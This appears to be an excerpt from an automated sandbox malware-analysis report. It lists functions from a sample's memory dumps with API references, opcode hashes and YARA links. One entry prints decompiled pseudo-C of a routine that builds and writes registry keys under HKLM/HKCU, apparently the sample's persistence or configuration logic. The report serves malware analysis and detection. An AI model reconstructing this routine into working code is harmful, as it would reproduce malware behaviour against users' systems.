                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction ID: 5c9c982138a02d9ea60e3df29f58f4abac5ed075490652780e9742afde9798e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction Fuzzy Hash: EC01C031900A19CBCB01DBE8C954AED777AAF95768F540D0DD410AB2D0DF74D9478B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7D0A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction ID: 754441454ffdcce11edbdf5973a80b12380b1481401f2f19d5bd2b6402722df7
                                                                                                                                  • Opcode Fuzzy Hash: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction Fuzzy Hash: 5D01AD7591061ADBDB02EBE8C8546FD7779AF85398F600E09D4116B2C0DB74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7579, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction ID: adac9e9d02c415bfa1da94608cddf526ebe83463a9d13019bb77094e22f0509e
                                                                                                                                  • Opcode Fuzzy Hash: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction Fuzzy Hash: C701003190061ACBCF01DFE8C8446EDBB7AAF85399F104D19D4206B2C0DF74DA0B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7A21, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction ID: f2cae7bac51491897d6804430f88878f2784499b1103424d8335ea1b7ea5f6c9
                                                                                                                                  • Opcode Fuzzy Hash: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction Fuzzy Hash: DF01C431900616DBDB01DBE8C8546EE7B79AF85394F110D09E4116B2C0DF749A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905398, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction ID: 358e915231c67d732a471a774b7cf4508512ed95c458f85b2a1d668df016cf7e
                                                                                                                                  • Opcode Fuzzy Hash: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction Fuzzy Hash: DC01AD71904619DBCF11DBE8C854AED7779AF95368F604D0DD410AB280DB74DD46CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F73BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction ID: 782399bd0ad5c3cbcb3ad7450edbb73f958966701449313e0df90b736cd0c7d0
                                                                                                                                  • Opcode Fuzzy Hash: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction Fuzzy Hash: 0C01C07190061ADBCF01DFE8C954AEE7B79AF95398F204D09D810AB2D0DF74DA4B9B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction ID: 1678171c9ebac73d6eabb11e4e256099e90fbaefa3b2f61e45b5820a44a64127
                                                                                                                                  • Opcode Fuzzy Hash: 1cb5fb0dbf8ead3edb56e296bed3117c0eee1e8cfc3b3aa51e3c55015d883c04
                                                                                                                                  • Instruction Fuzzy Hash: D301C031900619DBCF05DBE8C954AEE77BAAF95398F114D09D4106B2C0DF759E47CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction ID: 5b4425c6f94c1c861d846ecb29d72aa664c5ec95751fbda5a97360da72f5604e
                                                                                                                                  • Opcode Fuzzy Hash: 2317695287f27033c4efe903a19ce9f969b291ddc9b16ce942c84c7c7a5a7ab9
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900619DBCF01DBE8C994AEE7B79AF85398F114D09E4106B280EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F78F7, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction ID: ac8a07094d15551a8694c85ddc199398bb2cbecfc4aca8c91f7583edce66c46b
                                                                                                                                  • Opcode Fuzzy Hash: 31cd22187ae5ba17f3532dbd5cd75dfbf4dffba04c08468e5fc32c709a7f099c
                                                                                                                                  • Instruction Fuzzy Hash: BA01C071A0061ADBDF01DBE8C954AEDB7BAAF95398F104D09E4506B2C0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction ID: 0d5058e70bcb0a559f184b9b828f7ac90169e727680afa8374d7518b43e8fbc5
                                                                                                                                  • Opcode Fuzzy Hash: 3686bba3bee8e96078c8f6a104bd30e33814984ed11cfd446279ff405e9e3bcf
                                                                                                                                  • Instruction Fuzzy Hash: 9501ED31A10619DBCF01DBE8C854AEDBB7AAF85798F100C08D8107B2C0DB749947CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction ID: 8c10f35ad6274fd1dfaea977576a2d4c133fa56c925716ab5f3c05dd9e5b98fc
                                                                                                                                  • Opcode Fuzzy Hash: 7df6204f9d6c49063b2ccd8fbd09803162dc494f45baf35dab1c96057c6d67e5
                                                                                                                                  • Instruction Fuzzy Hash: EE010031900619CBCF01DBE8C954AEE7B79AF81398F114C09E8116B2C0DF749A07CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E00A3282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xa3d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00A31922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00A35C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00A34AAB(_a8);
						goto L29;
					}
					_t64 =  *0xa3d2b0; // 0x33a9b38
					_t16 = _t64 + 0xc; // 0x33a9c06
					_t65 = E00A31922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00a3c0
						if(E00A34A6D(_t97,  *_t33, _t91, _a8,  *0xa3d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xa3d2e0; // 0x296a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xa3ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xa3ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00A35F64(_t69,  *0xa3d374,  *0xa3d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xa3d2e0; // 0x296a5a8
									_t44 = _t71 + 0xa3e83e; // 0x74666f53
									_t73 = E00A31922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00a3c0
										E00A35DDA( *_t47, _t91, _a8,  *0xa3d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d00a3c0
										E00A35DDA( *_t49, _t91, _t99,  *0xa3d370, _a16);
										E00A34AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00a3c0
									E00A35DDA( *_t40, _t91, _a8,  *0xa3d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d00a3c0
									E00A35DDA( *_t43, _t91, _a8,  *0xa3d370, _a16);
								}
								if( *_t101 != 0) {
									E00A34AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00a3c0
					_t81 = E00A363F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00a3c0
							E00A34A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00A34AAB(_t100);
						_t98 = _a16;
					}
					E00A34AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00A3A938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xa3d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                  0x00a3282b
                                                                                                                                  0x00a32834
                                                                                                                                  0x00a3283b
                                                                                                                                  0x00a32840
                                                                                                                                  0x00a328ad
                                                                                                                                  0x00a328b3
                                                                                                                                  0x00a328b8
                                                                                                                                  0x00a328bf
                                                                                                                                  0x00a328c4
                                                                                                                                  0x00a328c9
                                                                                                                                  0x00a32a34
                                                                                                                                  0x00a32a3b
                                                                                                                                  0x00a32a3b
                                                                                                                                  0x00a32a40
                                                                                                                                  0x00a32a42
                                                                                                                                  0x00a32a42
                                                                                                                                  0x00a32a4b
                                                                                                                                  0x00a32a4b
                                                                                                                                  0x00a328cf
                                                                                                                                  0x00a328db
                                                                                                                                  0x00a32a2a
                                                                                                                                  0x00a32a2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00a32a2d
                                                                                                                                  0x00a328e1
                                                                                                                                  0x00a328e6
                                                                                                                                  0x00a328e9
                                                                                                                                  0x00a328ee
                                                                                                                                  0x00a328f3
                                                                                                                                  0x00a3293c
                                                                                                                                  0x00a3293c
                                                                                                                                  0x00a3294f
                                                                                                                                  0x00a32959
                                                                                                                                  0x00a3295f
                                                                                                                                  0x00a32966
                                                                                                                                  0x00a32970
                                                                                                                                  0x00a32970
                                                                                                                                  0x00a32968
                                                                                                                                  0x00a32968
                                                                                                                                  0x00a32968
                                                                                                                                  0x00a32968
                                                                                                                                  0x00a32992
                                                                                                                                  0x00a3299a
                                                                                                                                  0x00a329c8
                                                                                                                                  0x00a329cd
                                                                                                                                  0x00a329d4
                                                                                                                                  0x00a329d9
                                                                                                                                  0x00a329dd
                                                                                                                                  0x00a32a0f
                                                                                                                                  0x00a329df
                                                                                                                                  0x00a329ec
                                                                                                                                  0x00a329ef
                                                                                                                                  0x00a329ff
                                                                                                                                  0x00a32a02
                                                                                                                                  0x00a32a08
                                                                                                                                  0x00a32a08
                                                                                                                                  0x00a3299c
                                                                                                                                  0x00a329a9
                                                                                                                                  0x00a329ac
                                                                                                                                  0x00a329be
                                                                                                                                  0x00a329c1
                                                                                                                                  0x00a329c1
                                                                                                                                  0x00a32a19
                                                                                                                                  0x00a32a25
                                                                                                                                  0x00a32a1b
                                                                                                                                  0x00a32a1e
                                                                                                                                  0x00a32a1e
                                                                                                                                  0x00a32a19
                                                                                                                                  0x00a32992
                                                                                                                                  0x00000000
                                                                                                                                  0x00a32959
                                                                                                                                  0x00a32902
                                                                                                                                  0x00a32905
                                                                                                                                  0x00a3290c
                                                                                                                                  0x00a32912
                                                                                                                                  0x00a32915
                                                                                                                                  0x00a32917
                                                                                                                                  0x00a32923
                                                                                                                                  0x00a32926
                                                                                                                                  0x00a32926
                                                                                                                                  0x00a3292c
                                                                                                                                  0x00a32931
                                                                                                                                  0x00a32931
                                                                                                                                  0x00a32937
                                                                                                                                  0x00000000
                                                                                                                                  0x00a32937
                                                                                                                                  0x00a32845
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3286c
                                                                                                                                  0x00a3286c
                                                                                                                                  0x00a32878
                                                                                                                                  0x00a3288b
                                                                                                                                  0x00a32891
                                                                                                                                  0x00a32899
                                                                                                                                  0x00000000
                                                                                                                                  0x00a32899

                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(00A32197,0000005F,00000000,00000000,00000104), ref: 00A3285E
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00A3288B
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                    • Part of subcall function 00A35DDA: lstrlenW.KERNEL32(?,?,?,00A329F4,3D00A3C0,80000002,00A32197,00A3258B,74666F53,4D4C4B48,00A3258B,?,3D00A3C0,80000002,00A32197,?), ref: 00A35DFF
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00A328AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                  • String ID: ($\
                                                                                                                                  • API String ID: 3924217599-1512714803
                                                                                                                                  • Opcode ID: b824d1fccf8ce7b9d8af9a4038a0dbe90d81b770fa89b698d75d7c3e0ce6fcb8
                                                                                                                                  • Instruction ID: cdae158385314d487244e79a24c72c2f738558b3fefa1327c699a07507a2ff4d
                                                                                                                                  • Opcode Fuzzy Hash: b824d1fccf8ce7b9d8af9a4038a0dbe90d81b770fa89b698d75d7c3e0ce6fcb8
                                                                                                                                  • Instruction Fuzzy Hash: 0351477290060AEFDF22DFA4ED41FAA3BB9FF18390F108514FA1196161D735EE269B10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
